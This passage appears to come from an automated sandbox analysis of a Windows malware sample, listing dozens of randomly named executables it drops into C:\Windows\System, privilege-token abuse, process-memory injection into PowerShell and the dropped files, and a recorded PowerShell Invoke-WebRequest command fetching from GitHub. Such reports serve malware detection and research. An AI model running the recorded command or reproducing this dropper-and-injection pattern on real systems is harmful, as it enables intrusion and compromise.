File created C:\Windows\System\SZIvAyM.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\lnBpgHk.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\gvqyith.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ACYcJic.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\WzvmhOS.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\YVgHUDm.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\pgkcrPN.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\jEKypgJ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\QMNMMgX.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\yiqsHTo.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wJUVozo.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\DMQLisC.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\PGjqLJJ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\GSjRMSD.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ORrETLu.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\gnqEZXL.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\tYHJowa.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\uhsdniX.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\HJyzCtw.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\FiWVnev.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\mMDqeMX.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\YmVOmud.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\grtRzMm.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\vvZbVtj.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\tBLGwHC.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\iQIHnjv.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\MFrkvGy.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\hgQBJrp.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\zAlEDlq.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ovzojOY.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wrYDppJ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\jTSwlyI.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ZGZkfdu.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\MVtmpaE.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\OojyOlb.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\LawuhIZ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\gMZgGdW.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\PZdtMfY.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wTJDOwB.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\oeAqIfl.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\RcMLcRg.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\VcKQmuC.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\aFKEjCk.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\oJnkSlm.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4664 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\oybcRdh.exe
PID 4664 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\oybcRdh.exe
PID 4664 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\bCnfYEa.exe
PID 4664 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\bCnfYEa.exe
PID 4664 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\aCkRthi.exe
PID 4664 wrote to memory of 3604 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\aCkRthi.exe
PID 4664 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\Aldckeh.exe
PID 4664 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\Aldckeh.exe
PID 4664 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\wTJDOwB.exe
PID 4664 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\wTJDOwB.exe
PID 4664 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\oeAqIfl.exe
PID 4664 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\oeAqIfl.exe
PID 4664 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\odHQYrI.exe
PID 4664 wrote to memory of 2108 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\odHQYrI.exe
PID 4664 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\VJaUJdC.exe
PID 4664 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\VJaUJdC.exe
PID 4664 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\weCsJgR.exe
PID 4664 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\weCsJgR.exe
PID 4664 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\LseLwVD.exe
PID 4664 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\LseLwVD.exe
PID 4664 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ecKWWfP.exe
PID 4664 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ecKWWfP.exe
PID 4664 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\vgGRBeA.exe
PID 4664 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\vgGRBeA.exe
PID 4664 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\gPyGIbO.exe
PID 4664 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\gPyGIbO.exe
PID 4664 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ZuqZTuE.exe
PID 4664 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ZuqZTuE.exe
PID 4664 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\VxBsifi.exe
PID 4664 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\VxBsifi.exe
PID 4664 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\PcyaNwe.exe
PID 4664 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\PcyaNwe.exe
PID 4664 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\wkkltIF.exe
PID 4664 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\wkkltIF.exe
PID 4664 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\QadEqRo.exe
PID 4664 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\QadEqRo.exe
PID 4664 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\iUVRMkw.exe
PID 4664 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\iUVRMkw.exe
PID 4664 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\DXIWExJ.exe
PID 4664 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\DXIWExJ.exe
PID 4664 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\KzCJJsD.exe
PID 4664 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\KzCJJsD.exe
PID 4664 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\yqRRvbT.exe
PID 4664 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\yqRRvbT.exe
PID 4664 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\EniCXZH.exe
PID 4664 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\EniCXZH.exe
PID 4664 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ZtHcSzY.exe
PID 4664 wrote to memory of 4528 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ZtHcSzY.exe
PID 4664 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\tGsGqBS.exe
PID 4664 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\tGsGqBS.exe
PID 4664 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\YuOsXig.exe
PID 4664 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\YuOsXig.exe
PID 4664 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\kIHPGMB.exe
PID 4664 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\kIHPGMB.exe
PID 4664 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\FXjgfTE.exe
PID 4664 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\FXjgfTE.exe
PID 4664 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\jDpdvJi.exe
PID 4664 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\jDpdvJi.exe
PID 4664 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\GZwBlKE.exe
PID 4664 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\GZwBlKE.exe
PID 4664 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\pWmWOHY.exe
PID 4664 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\pWmWOHY.exe

Processes

C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\oybcRdh.exe

C:\Windows\System\oybcRdh.exe

C:\Windows\System\bCnfYEa.exe

C:\Windows\System\bCnfYEa.exe

C:\Windows\System\aCkRthi.exe

C:\Windows\System\aCkRthi.exe

C:\Windows\System\Aldckeh.exe

C:\Windows\System\Aldckeh.exe

C:\Windows\System\wTJDOwB.exe

C:\Windows\System\wTJDOwB.exe

C:\Windows\System\oeAqIfl.exe

C:\Windows\System\oeAqIfl.exe

C:\Windows\System\odHQYrI.exe

C:\Windows\System\odHQYrI.exe

C:\Windows\System\VJaUJdC.exe

C:\Windows\System\VJaUJdC.exe

C:\Windows\System\weCsJgR.exe

C:\Windows\System\weCsJgR.exe

C:\Windows\System\LseLwVD.exe

C:\Windows\System\LseLwVD.exe

C:\Windows\System\ecKWWfP.exe

C:\Windows\System\ecKWWfP.exe

C:\Windows\System\vgGRBeA.exe

C:\Windows\System\vgGRBeA.exe

C:\Windows\System\gPyGIbO.exe

C:\Windows\System\gPyGIbO.exe

C:\Windows\System\ZuqZTuE.exe

C:\Windows\System\ZuqZTuE.exe

C:\Windows\System\VxBsifi.exe

C:\Windows\System\VxBsifi.exe

C:\Windows\System\PcyaNwe.exe

C:\Windows\System\PcyaNwe.exe

C:\Windows\System\wkkltIF.exe

C:\Windows\System\wkkltIF.exe

C:\Windows\System\QadEqRo.exe

C:\Windows\System\QadEqRo.exe

C:\Windows\System\iUVRMkw.exe

C:\Windows\System\iUVRMkw.exe

C:\Windows\System\DXIWExJ.exe

C:\Windows\System\DXIWExJ.exe

C:\Windows\System\KzCJJsD.exe

C:\Windows\System\KzCJJsD.exe

C:\Windows\System\yqRRvbT.exe

C:\Windows\System\yqRRvbT.exe

C:\Windows\System\EniCXZH.exe

C:\Windows\System\EniCXZH.exe

C:\Windows\System\ZtHcSzY.exe

C:\Windows\System\ZtHcSzY.exe

C:\Windows\System\tGsGqBS.exe

C:\Windows\System\tGsGqBS.exe

C:\Windows\System\YuOsXig.exe

C:\Windows\System\YuOsXig.exe

C:\Windows\System\kIHPGMB.exe

C:\Windows\System\kIHPGMB.exe

C:\Windows\System\FXjgfTE.exe

C:\Windows\System\FXjgfTE.exe

C:\Windows\System\jDpdvJi.exe

C:\Windows\System\jDpdvJi.exe

C:\Windows\System\GZwBlKE.exe

C:\Windows\System\GZwBlKE.exe

C:\Windows\System\pWmWOHY.exe

C:\Windows\System\pWmWOHY.exe

C:\Windows\System\dWLbWOP.exe

C:\Windows\System\dWLbWOP.exe

C:\Windows\System\lQgyAad.exe

C:\Windows\System\lQgyAad.exe

C:\Windows\System\vBVfuCN.exe

C:\Windows\System\vBVfuCN.exe

C:\Windows\System\VQrrpah.exe

C:\Windows\System\VQrrpah.exe

C:\Windows\System\pqCjfaO.exe

C:\Windows\System\pqCjfaO.exe

C:\Windows\System\LcmobQW.exe

C:\Windows\System\LcmobQW.exe

C:\Windows\System\UmLskmS.exe

C:\Windows\System\UmLskmS.exe

C:\Windows\System\jHQight.exe

C:\Windows\System\jHQight.exe

C:\Windows\System\vCNwUBB.exe

C:\Windows\System\vCNwUBB.exe

C:\Windows\System\uHKWOMn.exe

C:\Windows\System\uHKWOMn.exe

C:\Windows\System\kWFMyBC.exe

C:\Windows\System\kWFMyBC.exe

C:\Windows\System\KaljWmd.exe

C:\Windows\System\KaljWmd.exe

C:\Windows\System\NaVioqg.exe

C:\Windows\System\NaVioqg.exe

C:\Windows\System\tzfpSPG.exe

C:\Windows\System\tzfpSPG.exe

C:\Windows\System\ExLvawr.exe

C:\Windows\System\ExLvawr.exe

C:\Windows\System\bIUkKSK.exe

C:\Windows\System\bIUkKSK.exe

C:\Windows\System\MVtmpaE.exe

C:\Windows\System\MVtmpaE.exe

C:\Windows\System\ptcUtgu.exe

C:\Windows\System\ptcUtgu.exe

C:\Windows\System\wgKTULn.exe

C:\Windows\System\wgKTULn.exe

C:\Windows\System\qCnbaAp.exe

C:\Windows\System\qCnbaAp.exe

C:\Windows\System\xZOHIpW.exe

C:\Windows\System\xZOHIpW.exe

C:\Windows\System\bkLktOC.exe

C:\Windows\System\bkLktOC.exe

C:\Windows\System\PGjqLJJ.exe

C:\Windows\System\PGjqLJJ.exe

C:\Windows\System\pWIWGWk.exe

C:\Windows\System\pWIWGWk.exe

C:\Windows\System\fNYKFBD.exe

C:\Windows\System\fNYKFBD.exe

C:\Windows\System\YVgHUDm.exe

C:\Windows\System\YVgHUDm.exe

C:\Windows\System\KaAdOLk.exe

C:\Windows\System\KaAdOLk.exe

C:\Windows\System\BMAybon.exe

C:\Windows\System\BMAybon.exe

C:\Windows\System\zPisPxP.exe

C:\Windows\System\zPisPxP.exe

C:\Windows\System\cDMOBQa.exe

C:\Windows\System\cDMOBQa.exe

C:\Windows\System\QVLpjvn.exe

C:\Windows\System\QVLpjvn.exe

C:\Windows\System\XhBveRS.exe

C:\Windows\System\XhBveRS.exe

C:\Windows\System\cXBAXvb.exe

C:\Windows\System\cXBAXvb.exe

C:\Windows\System\LGILxPu.exe

C:\Windows\System\LGILxPu.exe

C:\Windows\System\oEEWLLI.exe

C:\Windows\System\oEEWLLI.exe

C:\Windows\System\xObYYYK.exe

C:\Windows\System\xObYYYK.exe

C:\Windows\System\vxHNDSx.exe

C:\Windows\System\vxHNDSx.exe

C:\Windows\System\XRMfmIM.exe

C:\Windows\System\XRMfmIM.exe

C:\Windows\System\GzKTFIy.exe

C:\Windows\System\GzKTFIy.exe

C:\Windows\System\KhLHxtZ.exe

C:\Windows\System\KhLHxtZ.exe

C:\Windows\System\tEXobAf.exe

C:\Windows\System\tEXobAf.exe

C:\Windows\System\XigkeSd.exe

C:\Windows\System\XigkeSd.exe

C:\Windows\System\oibAqow.exe

C:\Windows\System\oibAqow.exe

C:\Windows\System\ufPRHNm.exe

C:\Windows\System\ufPRHNm.exe

C:\Windows\System\eUbKFNd.exe

C:\Windows\System\eUbKFNd.exe

C:\Windows\System\IMtRFNH.exe

C:\Windows\System\IMtRFNH.exe

C:\Windows\System\ebsyreY.exe

C:\Windows\System\ebsyreY.exe

C:\Windows\System\obpFlnl.exe

C:\Windows\System\obpFlnl.exe

C:\Windows\System\jcWwjnk.exe

C:\Windows\System\jcWwjnk.exe

C:\Windows\System\lCGoImP.exe

C:\Windows\System\lCGoImP.exe

C:\Windows\System\vMMCDYM.exe

C:\Windows\System\vMMCDYM.exe

C:\Windows\System\uDcdcFV.exe

C:\Windows\System\uDcdcFV.exe

C:\Windows\System\VfidMbB.exe

C:\Windows\System\VfidMbB.exe

C:\Windows\System\zOGujik.exe

C:\Windows\System\zOGujik.exe

C:\Windows\System\OVMPaAW.exe

C:\Windows\System\OVMPaAW.exe

C:\Windows\System\gecjUsr.exe

C:\Windows\System\gecjUsr.exe

C:\Windows\System\HJyzCtw.exe

C:\Windows\System\HJyzCtw.exe

C:\Windows\System\KpIzfht.exe

C:\Windows\System\KpIzfht.exe

C:\Windows\System\IppwyRU.exe

C:\Windows\System\IppwyRU.exe

C:\Windows\System\AdyjLqM.exe

C:\Windows\System\AdyjLqM.exe

C:\Windows\System\rmWNygk.exe

C:\Windows\System\rmWNygk.exe

C:\Windows\System\FtaoraB.exe

C:\Windows\System\FtaoraB.exe

C:\Windows\System\yhsLFrm.exe

C:\Windows\System\yhsLFrm.exe

C:\Windows\System\umjAbYB.exe

C:\Windows\System\umjAbYB.exe

C:\Windows\System\aCUfawP.exe

C:\Windows\System\aCUfawP.exe

C:\Windows\System\mhUgMbD.exe

C:\Windows\System\mhUgMbD.exe

C:\Windows\System\WqkzBXJ.exe

C:\Windows\System\WqkzBXJ.exe

C:\Windows\System\GYQqwiI.exe

C:\Windows\System\GYQqwiI.exe

C:\Windows\System\RcMLcRg.exe

C:\Windows\System\RcMLcRg.exe

C:\Windows\System\DVtCKyu.exe

C:\Windows\System\DVtCKyu.exe

C:\Windows\System\QGVdMtg.exe

C:\Windows\System\QGVdMtg.exe

C:\Windows\System\sjOLeIF.exe

C:\Windows\System\sjOLeIF.exe

C:\Windows\System\mogoeEg.exe

C:\Windows\System\mogoeEg.exe

C:\Windows\System\tPreQca.exe

C:\Windows\System\tPreQca.exe

C:\Windows\System\KCSzSHD.exe

C:\Windows\System\KCSzSHD.exe

C:\Windows\System\njgJVao.exe

C:\Windows\System\njgJVao.exe

C:\Windows\System\UCMUyat.exe

C:\Windows\System\UCMUyat.exe

C:\Windows\System\IsLQKZy.exe

C:\Windows\System\IsLQKZy.exe

C:\Windows\System\lvvBLcu.exe

C:\Windows\System\lvvBLcu.exe

C:\Windows\System\wNUQAdu.exe

C:\Windows\System\wNUQAdu.exe

C:\Windows\System\BTBKsIH.exe

C:\Windows\System\BTBKsIH.exe

C:\Windows\System\YhCDrye.exe

C:\Windows\System\YhCDrye.exe

C:\Windows\System\Vyuamqx.exe

C:\Windows\System\Vyuamqx.exe

C:\Windows\System\JMnmumY.exe

C:\Windows\System\JMnmumY.exe

C:\Windows\System\pEkhqzD.exe

C:\Windows\System\pEkhqzD.exe

C:\Windows\System\lMmgtSv.exe

C:\Windows\System\lMmgtSv.exe

C:\Windows\System\hEXDRpF.exe

C:\Windows\System\hEXDRpF.exe

C:\Windows\System\FBRcTrs.exe

C:\Windows\System\FBRcTrs.exe

C:\Windows\System\hgQBJrp.exe

C:\Windows\System\hgQBJrp.exe

C:\Windows\System\xhblNNA.exe

